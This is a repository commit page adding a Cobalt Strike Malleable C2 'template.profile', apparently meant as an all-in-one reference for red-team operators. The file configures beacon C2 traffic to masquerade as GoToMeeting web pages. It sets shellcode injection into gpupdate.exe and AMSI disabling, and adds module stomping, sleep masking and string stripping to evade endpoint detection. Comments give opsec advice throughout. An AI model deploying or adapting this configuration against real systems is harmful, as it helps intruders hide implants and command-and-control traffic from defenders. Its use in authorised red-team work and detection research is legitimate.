infosecn1nja
/
Malleable-C2-Profiles
mirror of https://github.com/infosecn1nja/Malleable-C2-Profiles.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create template.profile

master
xx0hcd 2019-03-12 09:56:42 -05:00 committed by GitHub
parent 059b8cfd8b
commit da3885e550
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 332 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

332
template.profile Normal file
View File

@ -0,0 +1,332 @@
#template profile
#options from https://www.cobaltstrike.com/help-malleable-c2
#attempt to get everything in one place with examples.
#xx0hcd
###global options###
set sleeptime "37500";
set jitter "33";
set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/587.38 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36";
#shows profile name in reports.
set sample_name "whatever.profile";
#custom cert
#https-certificate {
#set keystore "your_store_file.store";
#set password "your_store_pass";
#}
#self sign cert
https-certificate {
set C "US";
set CN "whatever.com";
set L "California";
set O "whatever LLC.";
set OU "local.org";
set ST "CA";
set validity "365";
}
#code sign cert.
#code-signer {
#set keystore "your_keystore.jks";
#set password "your_password";
#set alias "server";
#}
###DNS options###
set dns_idle "8.8.8.8";
set maxdns "245";
set dns_sleep "0";
set dns_stager_prepend "";
set dns_stager_subhost "";
set dns_max_txt "252";
set dns_ttl "1";
###SMB options###
#use different strings for pipename and pipename_stager.
set pipename "ntsvcs";
set pipename_stager "scerpc";
###TCP options###
set tcp_port "8000";
###HTTP options###
#Order of server response headers. Or you can just fill them in manually under the server blocks.
http-config {
set headers "Server, Content-Type, Cache-Control, Connection";
header "Content-Type" "text/html;charset=UTF-8";
header "Connection" "close";
header "Cache-Control" "max-age=2";
header "Server" "nginx";
}
#the client GET function checks if there are tasks queued.
http-get {
#You can specifiy multiple URI's with space between them.
set uri "/login /config /admin";
#default method is GET.
set verb "GET";
#set verb "POST";
client {
#Set headers based on traffic capture/Burp/etc.
header "Host" "whatever.com";
header "Accept" "*/*";
header "Accept-Language" "en-US";
header "Connection" "close";
metadata {
#Encoding options = append "string", base64, base64url, mask, netbios, netbiosu, prepend "string".
#base64
base64url;
#mask;
#netbios;
#netbiosu;
#prepend "TEST123";
append ".php";
#Termination statements = header "header", parameter "key", print, uri-append.
parameter "file";
#header "Cookie";
#uri-append;
#Have to set verb to POST if you want to use print in the client GET block.
#print;
}
#You can also add parameter values just to help mimic your site traffic.
parameter "test1" "test2";
}
server {
#headers are defined in the http-config block above, or you can set them manually here.
#header "Server" "nginx";
#the output keyword allows you to prepend/append data, to add site traffic, etc.
output {
netbios;
#netbiosu;
#base64;
#base64url;
#mask;
#Use prepend and append to mix your data in with normal looking site traffic. Escape double quotes and you can also use '\n'. c2lint shows '\n' as a period, but you can run it through Burp or pcap a HTTP payload to make sure everything is lining up correctly. Prepend strings need to be entered in reverse order, so the first string here is '"<!DOCTYPE html>\n";'.
prepend "content=";
prepend "<meta name=\"google-site-verification\"\n";
prepend "<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n";
prepend "<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n";
prepend "<link rel=\"canonical\" href=\"https://www.gotomeeting.com/b\">\n";
prepend "<title>Online Meeting Software with HD Video Conferencing | GoToMeeting</title>\n";
prepend " <meta charset=\"UTF-8\">\n";
prepend " <head>\n";
prepend "<html lang=\"en\">\n";
prepend "<!DOCTYPE html>\n";
append "\n<meta name=\"msvalidate.01\" content=\"63E628E67E6AD849F4185FA9AA7ABACA\">\n";
append "<script type=\"text/javascript\">\n";
append " var _kiq = _kiq || [];\n";
append " (function(){\n";
append " setTimeout(function(){\n";
append " var d = document, f = d.getElementsByTagName('script')[0], s =\n";
append "d.createElement('script'); s.type = 'text/javascript';\n";
append " s.async = true; s.src = '//s3.amazonaws.com/ki.js/66992/fWl.js';\n";
append "f.parentNode.insertBefore(s, f);\n";
append " }, 1);\n";
append "})();\n";
append "</script>\n";
append "</body>\n";
append "</html>\n";
#All server blocks use 'print' to termintate.
print;
}
}
}
#The same transform and termination rules apply as the client GET section above.
#if tasks are queued then POST processes them.
http-post {
#URI's cannot be the same as the client GET URI's, even changing one case is fine.
set uri "/Login /Config /Admin";
set verb "GET";
#set verb "POST";
client {
header "Host" "whatever.com";
header "Accept" "*/*";
header "Accept-Language" "en";
header "Connection" "close";
output {
base64url;
parameter "testParam";
}
#You can put the beacon id in - parameter "key", header "header",
#cannot add transform statements to beacon id.
id {
base64url;
parameter "id";
#header "ID-Header":
}
}
server {
#headers are defined in the http-config block above, or you can set them manually here.
#header "Server" "nginx";
output {
netbios;
prepend "content=";
prepend "<meta name=\"google-site-verification\"\n";
prepend "<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n";
prepend "<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n";
prepend "<link rel=\"canonical\" href=\"https://www.gotomeeting.com/b\">\n";
prepend "<title>Online Meeting Software with HD Video Conferencing | GoToMeeting</title>\n";
prepend " <meta charset=\"UTF-8\">\n";
prepend " <head>\n";
prepend "<html lang=\"en\">\n";
prepend "<!DOCTYPE html>\n";
append "\n<meta name=\"msvalidate.01\" content=\"63E628E67E6AD849F4185FA9AA7ABACA\">\n";
append "<script type=\"text/javascript\">\n";
append " var _kiq = _kiq || [];\n";
append " (function(){\n";
append " setTimeout(function(){\n";
append " var d = document, f = d.getElementsByTagName('script')[0], s =\n";
append "d.createElement('script'); s.type = 'text/javascript';\n";
append " s.async = true; s.src = '//s3.amazonaws.com/ki.js/66992/fWl.js';\n";
append "f.parentNode.insertBefore(s, f);\n";
append " }, 1);\n";
append "})();\n";
append "</script>\n";
append "</body>\n";
append "</html>\n";
print;
}
}
}
#Options to set if you are using a staged payload. Stageless payloads are more Opsec safe.
http-stager {
#Same URI rules apply as above, can't have URI's that match in any other client block.
set uri_x86 "/Console";
set uri_x64 "/console";
client {
header "Host" "whatever.com";
header "Accept" "*/*";
header "Accept-Language" "en-US";
header "Connection" "close";
}
server {
#headers are defined in the http-config block above, or you can set them manually here.
#header "Server" "nginx";
}
}
###Malleable PE Options###
#Sets the default program to open and inject shellcode into.
set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
#attempt to disable amsi for execute-assembly, powerpick, and psinject.
set amsi_disable "true";
#use peclone on the dll you want to use, this example uses wwanmm.dll. You can also set the values manually.
#don't use 'set image_size_xx' if using 'set module_xx'. During testing it seemed to double the size of my payload causing module stomp to fail, need to test it out more though.
stage {
set checksum "0";
set compile_time "25 Oct 2016 01:57:23";
set entry_point "170000";
#set image_size_x86 "6586368";
#set image_size_x64 "6586368";
#set name "WWanMM.dll";
set userwx "false";
set cleanup "true";
set sleep_mask "true";
set stomppe "true";
set obfuscate "true";
set rich_header "\xee\x50\x19\xcf\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xa3\x49\xe4\x9c\x84\x31\x77\x9c\x1e\xad\x86\x9c\xae\x31\x77\x9c\x1e\xad\x85\x9c\xa7\x31\x77\x9c\xaa\x31\x76\x9c\x08\x31\x77\x9c\x1e\xad\x98\x9c\xa3\x31\x77\x9c\x1e\xad\x84\x9c\x98\x31\x77\x9c\x1e\xad\x99\x9c\xab\x31\x77\x9c\x1e\xad\x80\x9c\x6d\x31\x77\x9c\x1e\xad\x9a\x9c\xab\x31\x77\x9c\x1e\xad\x87\x9c\xab\x31\x77\x9c\x52\x69\x63\x68\xaa\x31\x77\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
#obfuscate beacon before sleep.
set sleep_mask "true";
#module stomp. Make sure the dll you use is bigger than your payload and test it with post exploit options to make sure everything is working.
set module_x86 "wwanmm.dll";
set module_x64 "wwanmm.dll";
#transform allows you to remove, replace, and add strings to beacon's reflective dll stage.
transform-x86 {
prepend "\x90\x90\x90";
strrep "ReflectiveLoader" "";
strrep "beacon.dll" "";
}
transform-x64 {
prepend "\x90\x90\x90";
strrep "ReflectiveLoader" "";
strrep "beacon.x64.dll" "";
}
#can set a string in the .rdata section of the beacon dll.
#adds a zero-terminated string
#string "something";
#adds a string 'as-is'
#data "something";
#adds a wide (UTF-16LE encoded) string
stringw "something";
}
#controls process injection behavior
process-inject {
set min_alloc "16700";
set startrwx "true";
set userwx "false";
transform-x86 {
prepend "\x90\x90\x90";
}
transform-x64 {
prepend "\x90\x90\x90";
}
#disable can cause some beacon issues
#no c2lint warning...
disable "SetThreadContext";
#c2lint warning ".process-inject disables several functions. As a result: x86 -> x86 injection will fail."
#disable "CreateRemoteThread";
#c2lint warning ".process-inject disables several functions. As a result: x86 -> x64 injection will fail."
#disable "RtlCreateUserThread";
}